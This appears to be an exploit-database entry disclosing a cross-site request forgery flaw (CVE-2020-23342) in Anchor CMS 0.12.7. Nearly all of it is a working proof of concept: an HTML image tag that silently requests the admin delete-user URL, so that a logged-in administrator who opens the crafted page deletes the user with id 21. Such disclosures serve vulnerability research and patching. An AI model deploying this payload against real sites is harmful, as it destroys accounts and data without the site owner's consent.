[] NeoSense

Anchor CMS 0.12.7 - CSRF (Delete user)

Author: Ninad Mishra
type: webapps
platform: multiple
port: 
date_added: 2021-01-21 
date_updated: 2021-01-21 
verified: 0 
codes: CVE-2020-23342 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
# Exploit Author: Ninad Mishra
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://anchorcms.com/download
# Version: 0.12.7
# CVE : CVE-2020-23342


###PoC
the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html

================================
<img src="http://target/anchor/index.php/admin/users/delete/21">
================================
Where (21) is the user id .

When admin clicks on exploit.html link

User with id 21 will be deleted